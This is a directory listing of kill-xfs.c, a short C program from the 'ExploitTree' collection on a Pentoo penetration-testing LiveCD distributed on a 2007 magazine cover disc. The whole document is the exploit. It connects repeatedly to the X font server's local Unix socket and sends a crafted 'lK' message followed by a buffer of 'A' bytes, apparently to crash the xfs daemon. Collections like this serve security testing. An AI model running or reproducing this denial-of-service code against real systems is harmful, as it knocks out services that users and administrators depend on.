home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / xwin / kill-xfs.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  478b  |  26 lines

  1. #include <sys/socket.h>                                      
  2. #include <sys/un.h>
  3.  
  4. #define CNT 50
  5. #define FS "/tmp/.font-unix/fs-1"
  6.  
  7. int s,y;
  8. struct sockaddr_un x;
  9.  
  10. char buf[CNT];
  11.  
  12. main() {
  13.   for (y;y<2;y++) {
  14.     s=socket(PF_UNIX,SOCK_STREAM,0);
  15.     x.sun_family=AF_UNIX;
  16.     strcpy(x.sun_path,FS);
  17.     if (connect(s,&x,sizeof(x))) { perror(FS); exit(1); }
  18.     if (!y) write(s,"lK",2);
  19.     memset(buf,'A',CNT);
  20.     write(s,buf,CNT);
  21.     shutdown(s,2);
  22.     close(s);
  23.   } 
  24. }   
  25.  
  26.